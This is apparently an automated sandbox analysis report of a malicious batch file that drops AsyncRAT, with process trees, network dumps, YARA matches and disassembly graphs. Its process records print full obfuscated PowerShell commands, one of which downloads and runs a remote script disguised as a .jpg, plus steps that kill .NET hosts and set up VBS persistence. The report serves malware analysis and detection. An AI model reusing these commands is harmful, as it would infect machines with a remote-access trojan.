                                                                                                        2024-11-25 14:22:50 UTC16355OUTData Raw: e9 8f da fb 08 98 fa 88 ad 1d 81 e9 80 a9 0f db fb 5a 24 d3 7f d2 30 f5 a1 fb 17 c5 cc 07 ef 4f d3 1f f8 59 1f fd 52 8f f1 22 08 04 df 38 ac 3a f9 be 34 63 ad 88 e4 5f c4 a8 02 d0 53 cb bf ee bb 06 8b bd 5a fc 69 3c 0a 92 80 1d 27 ff 38 1e bc ca f6 01 fa c4 b9 21 38 92 7a 62 ea 6d 3f 6c 89 e6 1b 51 d8 7b 06 a0 40 f4 09 c6 12 7e b9 ea ef 2d df cd ad 04 20 cf f9 93 e8 93 ec f3 b1 fc 1c 40 e6 4e b4 78 11 80 92 7f 12 7f 11 7a 36 a0 04 5f 7d 4c b8 16 83 40 1f 88 23 ff 6a 19 e8 85 a0 a4 9f 24 9f a4 9e 3f de 0b 91 00 54 be 62 f9 98 70 a9 fe 93 0c 94 fc 6b c5 e0 91 bd 67 ff d1 f7 63 2f f2 fc 18 99 87 00 d4 b3 fe ea 1c f0 c7 80 25 00 35 97 f3 99 2b f2 2f 5f 3a 42 9c bc 22 05 25 00 25 f4 c0 0b bf b5 47 db e7 b0 18 7d 72 fb e4 9f b5 6b 0e 47 02 de 9a 66 0e a1 ea 0f
                                                                                                        Data Ascii: Z$0OYR"8:4c_SZi<'8!8zbm?lQ{@~- @Nxz6_}L@#j$?Tbpkgc/%5+/_:B"%%G}rkGf
                                                                                                        2024-11-25 14:22:50 UTC116OUTData Raw: 17 7d 7e ac 7c fa b5 fc 23 46 f5 1f 22 4f 48 e2 75 8f fb 5e 4f e2 39 bc dc 1b 47 00 66 d9 67 63 90 08 cc fd 63 a8 02 ec 31 73 2c 52 b0 61 d5 71 b6 f6 cd 88 bf 66 4e 7d cd 37 e3 46 00 4a f4 49 e8 51 0d a8 0b 41 a8 f0 93 b8 e3 16 60 09 40 84 1d cf 09 94 00 94 04 04 c4 5d 16 76 7a fe 9f ad 95 34 cc 6b 4b c5 21 55 85 7a 0e 60 24 00 41 cf 04 44 02 22
                                                                                                        Data Ascii: }~|#F"OHu^O9Gfgcc1s,RaqfN}7FJIQA`@]vz4kK!Uz`$AD"
                                                                                                        2024-11-25 14:22:52 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Mon, 25 Nov 2024 14:22:52 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 973
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:09:22:11
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pe4905VGl1.bat" "
                                                                                                        Imagebase:0x7ff7c9b70000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:1
                                                                                                        Start time:09:22:12
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:3
                                                                                                        Start time:09:22:12
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:CMD /C pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
                                                                                                        Imagebase:0x7ff7c9b70000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:4
                                                                                                        Start time:09:22:12
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:pOwerShEll -WindowStyle hidden -ExecutionPolicy bypass -Command "[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.2026750928.000002E7E3053000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.1865192800.000002E7C8CF4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.1865192800.000002E7C8C60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.2018457002.000002E7E2CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.1867257966.000002E7C8E40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.1868647268.000002E7CA7B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.1868900966.000002E7CACD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000004.00000002.1868900966.000002E7CB886000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:5
                                                                                                        Start time:09:22:24
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM CCleanerBrowser.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:6
                                                                                                        Start time:09:22:24
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM aspnet_regbrowsers.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:7
                                                                                                        Start time:09:22:25
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM aspnet_compiler.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:8
                                                                                                        Start time:09:22:25
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM AppLaunch.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:9
                                                                                                        Start time:09:22:25
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM InstallUtil.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:10
                                                                                                        Start time:09:22:25
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM jsc.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:11
                                                                                                        Start time:09:22:26
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM MSBuild.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:12
                                                                                                        Start time:09:22:27
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM RegAsm.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:13
                                                                                                        Start time:09:22:27
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM cvtres.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:14
                                                                                                        Start time:09:22:27
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\taskkill.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\taskkill.exe" /IM RegSvcs.exe /F
                                                                                                        Imagebase:0x7ff748050000
                                                                                                        File size:101'376 bytes
                                                                                                        MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:16
                                                                                                        Start time:09:22:42
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs"
                                                                                                        Imagebase:0x7ff73b700000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:17
                                                                                                        Start time:09:22:42
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\AXAGFIIEZBBS.bat" "
                                                                                                        Imagebase:0x7ff7c9b70000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:18
                                                                                                        Start time:09:22:42
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:19
                                                                                                        Start time:09:22:42
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:PowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\AMRKKUAMRKKsAMRKKeAMRKKrAMRKKs\PAMRKKuAMRKKbAMRKKlAMRKKiAMRKKc\LMKGJHPBNG.ps1'.replace('AMRKK','')"
                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:20
                                                                                                        Start time:09:22:43
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                        Imagebase:0x310000
                                                                                                        File size:56'368 bytes
                                                                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:21
                                                                                                        Start time:09:22:43
                                                                                                        Start date:25/11/2024
                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                        Imagebase:0x6a0000
                                                                                                        File size:56'368 bytes
                                                                                                        MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        Has exited:false

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:3.1%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:3
                                                                                                          Total number of Limit Nodes:0
                                                                                                          execution_graph 12872 7ffb4b176344 12873 7ffb4b17634d LoadLibraryExW 12872->12873 12875 7ffb4b1763fd 12873->12875

                                                                                                          Executed Functions

                                                                                                          Function 00007FFB4B16DAF6 Relevance: .5, Instructions: 468COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 167 7ffb4b16daf6-7ffb4b16db03 168 7ffb4b16db0e-7ffb4b16dbd7 167->168 169 7ffb4b16db05-7ffb4b16db0d 167->169 173 7ffb4b16dbd9-7ffb4b16dbe2 168->173 174 7ffb4b16dc43 168->174 169->168 173->174 176 7ffb4b16dbe4-7ffb4b16dbf0 173->176 175 7ffb4b16dc45-7ffb4b16dc6a 174->175 183 7ffb4b16dc6c-7ffb4b16dc75 175->183 184 7ffb4b16dcd6 175->184 177 7ffb4b16dbf2-7ffb4b16dc04 176->177 178 7ffb4b16dc29-7ffb4b16dc41 176->178 180 7ffb4b16dc08-7ffb4b16dc1b 177->180 181 7ffb4b16dc06 177->181 178->175 180->180 182 7ffb4b16dc1d-7ffb4b16dc25 180->182 181->180 182->178 183->184 185 7ffb4b16dc77-7ffb4b16dc83 183->185 186 7ffb4b16dcd8-7ffb4b16dd80 184->186 187 7ffb4b16dcbc-7ffb4b16dcd4 185->187 188 7ffb4b16dc85-7ffb4b16dc97 185->188 197 7ffb4b16dd82-7ffb4b16dd8c 186->197 198 7ffb4b16ddee 186->198 187->186 190 7ffb4b16dc9b-7ffb4b16dcae 188->190 191 7ffb4b16dc99 188->191 190->190 193 7ffb4b16dcb0-7ffb4b16dcb8 190->193 191->190 193->187 197->198 199 7ffb4b16dd8e-7ffb4b16dd9b 197->199 200 7ffb4b16ddf0-7ffb4b16de19 198->200 201 7ffb4b16dd9d-7ffb4b16ddaf 199->201 202 7ffb4b16ddd4-7ffb4b16ddec 199->202 206 7ffb4b16de1b-7ffb4b16de26 200->206 207 7ffb4b16de83 200->207 204 7ffb4b16ddb1 201->204 205 7ffb4b16ddb3-7ffb4b16ddc6 201->205 202->200 204->205 205->205 208 7ffb4b16ddc8-7ffb4b16ddd0 205->208 206->207 209 7ffb4b16de28-7ffb4b16de36 206->209 210 7ffb4b16de85-7ffb4b16df2b 207->210 208->202 211 7ffb4b16de6f-7ffb4b16de81 209->211 212 7ffb4b16de38-7ffb4b16de4a 209->212 219 7ffb4b16df2d 210->219 220 7ffb4b16df33-7ffb4b16df6d call 7ffb4b16dfb4 210->220 211->210 213 7ffb4b16de4e-7ffb4b16de61 212->213 214 7ffb4b16de4c 212->214 213->213 216 7ffb4b16de63-7ffb4b16de6b 213->216 214->213 216->211 219->220 226 7ffb4b16df72-7ffb4b16df98 220->226 228 7ffb4b16df9f-7ffb4b16dfb3 226->228 229 7ffb4b16df9a 226->229 229->228
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2037436111.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c4dec3a330c9d9eaba91716ae238ac9b5c292d297ee8a8d0f56c5127e60fcd18
                                                                                                          • Instruction ID: 5e9a92e0fbf61da3b2f630f865d2280eecd98f0e382ccf8e7f78b6edc759fc7b
                                                                                                          • Opcode Fuzzy Hash: c4dec3a330c9d9eaba91716ae238ac9b5c292d297ee8a8d0f56c5127e60fcd18
                                                                                                          • Instruction Fuzzy Hash: 35F1A17091CA4D8FEBA8EF28C8557E937E1FF54310F04826EE84DC7291DB7499458B82
                                                                                                          Function 00007FFB4B16E8A2 Relevance: .5, Instructions: 454COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 230 7ffb4b16e8a2-7ffb4b16e8af 231 7ffb4b16e8b1-7ffb4b16e8b9 230->231 232 7ffb4b16e8ba-7ffb4b16e987 230->232 231->232 236 7ffb4b16e989-7ffb4b16e992 232->236 237 7ffb4b16e9f3 232->237 236->237 238 7ffb4b16e994-7ffb4b16e9a0 236->238 239 7ffb4b16e9f5-7ffb4b16ea1a 237->239 240 7ffb4b16e9a2-7ffb4b16e9b4 238->240 241 7ffb4b16e9d9-7ffb4b16e9f1 238->241 246 7ffb4b16ea1c-7ffb4b16ea25 239->246 247 7ffb4b16ea86 239->247 242 7ffb4b16e9b8-7ffb4b16e9cb 240->242 243 7ffb4b16e9b6 240->243 241->239 242->242 245 7ffb4b16e9cd-7ffb4b16e9d5 242->245 243->242 245->241 246->247 249 7ffb4b16ea27-7ffb4b16ea33 246->249 248 7ffb4b16ea88-7ffb4b16eaad 247->248 256 7ffb4b16eaaf-7ffb4b16eab9 248->256 257 7ffb4b16eb1b 248->257 250 7ffb4b16ea6c-7ffb4b16ea84 249->250 251 7ffb4b16ea35-7ffb4b16ea47 249->251 250->248 252 7ffb4b16ea4b-7ffb4b16ea5e 251->252 253 7ffb4b16ea49 251->253 252->252 255 7ffb4b16ea60-7ffb4b16ea68 252->255 253->252 255->250 256->257 259 7ffb4b16eabb-7ffb4b16eac8 256->259 258 7ffb4b16eb1d-7ffb4b16eb4b 257->258 265 7ffb4b16eb4d-7ffb4b16eb58 258->265 266 7ffb4b16ebbb 258->266 260 7ffb4b16eb01-7ffb4b16eb19 259->260 261 7ffb4b16eaca-7ffb4b16eadc 259->261 260->258 263 7ffb4b16eae0-7ffb4b16eaf3 261->263 264 7ffb4b16eade 261->264 263->263 267 7ffb4b16eaf5-7ffb4b16eafd 263->267 264->263 265->266 268 7ffb4b16eb5a-7ffb4b16eb68 265->268 269 7ffb4b16ebbd-7ffb4b16ecaa 266->269 267->260 270 7ffb4b16eba1-7ffb4b16ebb9 268->270 271 7ffb4b16eb6a-7ffb4b16eb7c 268->271 280 7ffb4b16ecb2-7ffb4b16eccc 269->280 281 7ffb4b16ecac 269->281 270->269 272 7ffb4b16eb80-7ffb4b16eb93 271->272 273 7ffb4b16eb7e 271->273 272->272 275 7ffb4b16eb95-7ffb4b16eb9d 272->275 273->272 275->270 284 7ffb4b16ecd5-7ffb4b16ed14 call 7ffb4b16ed30 280->284 281->280 289 7ffb4b16ed1b-7ffb4b16ed2f 284->289 290 7ffb4b16ed16 284->290 290->289
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2037436111.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f40e141ad46c7637f3d0c66d526e5859a2a795752a6771061481a21186c380ba
                                                                                                          • Instruction ID: 696174f638f4cbe0204d6ab1a47dcf634ab14d5d069db353b42e1a640a80d5d3
                                                                                                          • Opcode Fuzzy Hash: f40e141ad46c7637f3d0c66d526e5859a2a795752a6771061481a21186c380ba
                                                                                                          • Instruction Fuzzy Hash: 77E1C17191CA4A8FEBA8EF2CC8957E977D1FF54310F04866ED84DC3295CE78A8418B81
                                                                                                          Function 00007FFB4B176344 Relevance: 1.6, APIs: 1, Instructions: 116libraryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2037436111.00007FFB4B160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B160000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ffb4b160000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad
                                                                                                          • String ID:
                                                                                                          • API String ID: 1029625771-0
                                                                                                          • Opcode ID: 9b032ac479ddecd8907ff787f6f5abc37327a4a7dcb6592a0a644b72bd63651b
                                                                                                          • Instruction ID: 4a0410b8cc11fa67253697d1f9b238c346791fccfbba5d1bf3749335d97c8eab
